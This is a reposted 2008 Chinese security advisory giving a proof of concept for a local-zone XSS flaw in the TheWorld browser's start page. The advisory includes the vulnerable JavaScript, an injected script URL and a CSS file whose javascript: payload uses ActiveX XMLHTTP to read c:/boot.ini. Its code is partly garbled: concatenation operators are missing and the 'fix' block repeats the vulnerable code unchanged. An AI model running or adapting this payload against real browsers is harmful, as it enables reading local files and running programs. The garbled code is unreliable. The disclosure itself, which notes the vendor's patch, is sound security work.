世界之窗等瀏覽器本地xss跨域漏洞POC
互聯(lián)網(wǎng) 發(fā)布時(shí)間:2008-10-08 20:02:20 作者:佚名
我要評論
漏洞說明:http://www.80sec.com/360-sec-browser-localzone-xss.html
文檔來源:http://www.80sec.com/release/The-world-browser-locale-zone-xss-POC.txt
漏洞分析:世界之窗瀏覽器在起始頁面是以res://E:PROGRA~1THEWOR~1.0languageschs.dll
漏洞說明:http://www.80sec.com/360-sec-browser-localzone-xss.html
文檔來源:http://www.80sec.com/release/The-world-browser-locale-zone-xss-POC.txt
漏洞分析:世界之窗瀏覽器在起始頁面是以res://E:\PROGRA~1\THEWOR~1.0\languages\chs.dll/TWHOME.HTM的形式來處理的,而由于缺乏對res協(xié)議安全的必要控制,導(dǎo)致頁面的權(quán)限很高,而該頁面中存在的一個(gè)xss問題將導(dǎo)致本地跨域漏洞,簡單分析如下:
<script language="JavaScript">
var nOldCount = 0;
for( i = 0; i < g_nCountOld; i )
{
str_url = g_arr_argUrlOld[i];
str_name = g_arr_argNameOld[i];
str_td = “<tr ID=’twOldItem” i ”‘><td valign=’top’ width=’64′><div align=’right’><a style=’cursor:hand’ title=’刪除當(dāng)前項(xiàng)’ onclick=\”javascript:tw_DeleteItemOld(’” i ”‘);\”>” “<img border=’0′ src=’twpage_delete.gif’ width=’16′ height=’16′></div></a></td>”;
document.write( str_td );
str_td = “<td><a target=’_blank’ href=’” str_url “‘>” str_name “</a></td></tr>”;
document.write( str_td );
nOldCount = i;
g_bHasLastUrl = true;
}
</script>
str_name和str_url不經(jīng)過濾地直接輸出,由于該頁面處于本地安全區(qū)域,所以擁有很高的權(quán)限,可以做很多跨域操作,包括讀取文件和運(yùn)行本地程序。
漏洞修補(bǔ):
<script language="JavaScript">
var nOldCount = 0;
for( i = 0; i < g_nCountOld; i )
{
str_url = g_arr_argUrlOld[i];
str_name = g_arr_argNameOld[i];
str_td = “<tr ID=’twOldItem” i ”‘><td valign=’top’ width=’64′><div align=’right’><a style=’cursor:hand’ title=’刪除當(dāng)前項(xiàng)’ onclick=\”javascript:tw_DeleteItemOld(’” i ”‘);\”>” “<img border=’0′ src=’twpage_delete.gif’ width=’16′ height=’16′></div></a></td>”;
document.write( str_td );
str_td = “<td><a target=’_blank’ href=’” str_url “‘>” str_name “</a></td></tr>”;
document.write( str_td );
nOldCount = i;
g_bHasLastUrl = true;
}
</script>
已經(jīng)用js控制DOM顯示了
漏洞演示:這里提供測試方法可以讀取c:/boot.ini
1 打開如下地址
sc:h’><script>alert(document.write(unescape(””)))</script>
2 上面將導(dǎo)致一個(gè)不可訪問的頁面,然后直接關(guān)閉tw瀏覽器( 沒有好的辦法crash)
3 重新打開tw瀏覽器,可以發(fā)現(xiàn)http://www.80sec.com/1.css中的內(nèi)容被解析,并且有本地域的權(quán)限。
1.css內(nèi)容,換成其他js代碼一樣執(zhí)行
body {
background-image: url('javascript:alert(document.location);xmlhttp=new ActiveXObject("Msxml2.XMLHTTP.3.0");xmlhttp.open("GET","c:/boot.ini",false);xmlhttp.send();alert(xmlhttp.responseText);')
}
漏洞狀態(tài):
2008-06-24通知廠商
2008-06-25修補(bǔ)
http://www.ioage.com/cnnew/uplog.htm
相關(guān)文章

TheWorld 世界之窗瀏覽器 v7.0.0.108 綠色免費(fèi)版 集成flash34.0.0.321
世界之窗瀏覽器,是一款小巧、快速、簡潔著稱的國產(chǎn)雙核瀏覽器,UI風(fēng)格非常簡約,無任何多余東西;具有體積小巧、啟動速度快、打開網(wǎng)頁快、資源占用小、使用流暢等特色,在2024-09-19
TheWorld 世界之窗瀏覽器 v7.0.0.108 優(yōu)化安裝版
世界之窗瀏覽器(TheWorld)是一款小巧、快速、安全、功能強(qiáng)大的多窗口瀏覽器,世界之窗瀏覽器采用IE內(nèi)核,兼容微軟ie瀏覽器,支持IE插件,具有瀏覽速度快、占用資源少、廣2025-08-25
世界之窗(極速版) TheWorld Chrome V5.0.342.5 官方安裝版
大家好,轉(zhuǎn)眼間又是一年過去,現(xiàn)在我們就要過2010年的春節(jié)了,對于從第一個(gè)版本就陪伴我們一路走來的用戶朋友來說,已經(jīng)五年過去了,真是光陰似箭?。? 一直以來,工作2010-04-04
世界之窗綠色增強(qiáng)優(yōu)化版目前所有的多窗口瀏覽器中,只有IE7實(shí)現(xiàn)了多線程多窗口,既每個(gè)窗口是一個(gè)單獨(dú)的線程,這樣的好處是不言而喻的,可以充分利用系統(tǒng)資源,避免某個(gè)子2011-07-04
世界之窗 TheWorld Chrome v6.2.0.112 綠色免費(fèi)版
世界之窗瀏覽器官方最新版是一款安全實(shí)用的電腦瀏覽器,界面簡約,性能穩(wěn)定,兼容性強(qiáng),支持多窗口同步流暢,無插件無限制,速度極快,歡迎下載2025-08-08
多標(biāo)簽多窗口瀏覽器 世界之窗 TheWorld v4.2.0.102 綠色極速版
世界之窗瀏覽器極速版(也可以叫做TheWorld Chrome版),看起來像是僅僅在Google Chrome瀏覽器基礎(chǔ)上更換一套默認(rèn)皮膚,預(yù)置幾個(gè)擴(kuò)展。2011-11-02- 問:我有多個(gè)QQ,在“世界之窗”瀏覽器里進(jìn)行QQ“好友”、“搶車位”的過程中,我發(fā)現(xiàn)第一個(gè)QQ沒問題,第二、第三個(gè)后的QQ就仍然無法進(jìn)行“好友”、“搶車位”,但我已2009-04-27
世界之窗瀏覽器 2.3 Final (2.3.0.7)綠色增強(qiáng)版_可清除隱藏文字
一些網(wǎng)站或論壇為了防止文章被復(fù)制,加入了隱藏文字保護(hù)機(jī)制,這樣當(dāng)你直接復(fù)制文字時(shí),會附加出現(xiàn)一大堆隱藏的亂碼,這個(gè)插件就是專門用來清除這樣隱藏文字用的。站長編輯2008-09-20
世界之窗瀏覽器(多標(biāo)簽多窗口瀏覽器) v7.0.0.108 中文官方安裝版
世界之窗瀏覽器是一款小巧快速、 安全穩(wěn)定、功能貼心的綠色瀏覽器2017-02-24







